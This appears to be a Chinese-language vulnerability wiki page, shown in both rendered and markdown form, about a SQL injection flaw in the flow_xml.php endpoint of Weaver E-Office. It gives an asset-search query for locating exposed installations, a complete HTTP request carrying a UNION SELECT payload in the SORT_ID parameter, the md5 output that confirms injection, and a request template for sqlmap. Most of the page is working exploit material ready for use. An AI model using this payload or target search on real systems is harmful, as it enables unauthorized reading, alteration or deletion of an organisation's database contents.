fofamini-wiki

登录白背景

源码

泛微 E-Office flow_xml SQL注入漏洞

一、漏洞简介

泛微 E-Office flow_xml SQL注入漏洞，攻击者可利用该漏洞执行任意SQL语句，进行增、删、改、查等数据库操作，造成数据库敏感数据信息泄露或被篡改

二、影响版本

泛微E-office

三、资产测绘

hunterapp.name="泛微 e-office OA"
特征

四、漏洞复现

GET /general/system/workflow/flow_type/flow_xml.php?SORT_ID=1%20union%20select%201,(md5(1)),3,4,5,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: LOGIN_LANG=cn
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

c4ca4238a0b923820dcc509a6f75849b

sqlmap

GET /general/system/workflow/flow_type/flow_xml.php?SORT_ID=1 HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: LOGIN_LANG=cn
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

原文: https://www.yuque.com/xiaokp7/ocvun2/mzoaphb0ruiux5iu

# 泛微 E-Office flow_xml SQL注入漏洞

# 一、漏洞简介
泛微 E-Office flow_xml SQL注入漏洞，攻击者可利用该漏洞执行任意SQL语句，进行增、删、改、查等数据库操作，造成数据库敏感数据信息泄露或被篡改

# 二、影响版本
+ 泛微E-office

# 三、资产测绘
+ hunter`app.name="泛微 e-office OA"`
+ 特征

![1697636315366-3abf642e-3433-4ce8-83ef-2bfdeaccb371.png](./img/PX2a21TE6zxNIMUN/1697636315366-3abf642e-3433-4ce8-83ef-2bfdeaccb371-658057.png)

# 四、漏洞复现
```plain
GET /general/system/workflow/flow_type/flow_xml.php?SORT_ID=1%20union%20select%201,(md5(1)),3,4,5,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: LOGIN_LANG=cn
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
```

![1711719323801-65ffc91d-059b-484f-a8ba-c0222675c8cd.png](./img/PX2a21TE6zxNIMUN/1711719323801-65ffc91d-059b-484f-a8ba-c0222675c8cd-791923.png)

```plain
c4ca4238a0b923820dcc509a6f75849b
```

sqlmap

```plain
GET /general/system/workflow/flow_type/flow_xml.php?SORT_ID=1 HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: LOGIN_LANG=cn
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
```

![1711719356228-93d90262-f447-451a-8e95-c576d471d38f.png](./img/PX2a21TE6zxNIMUN/1711719356228-93d90262-f447-451a-8e95-c576d471d38f-464078.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mzoaphb0ruiux5iu>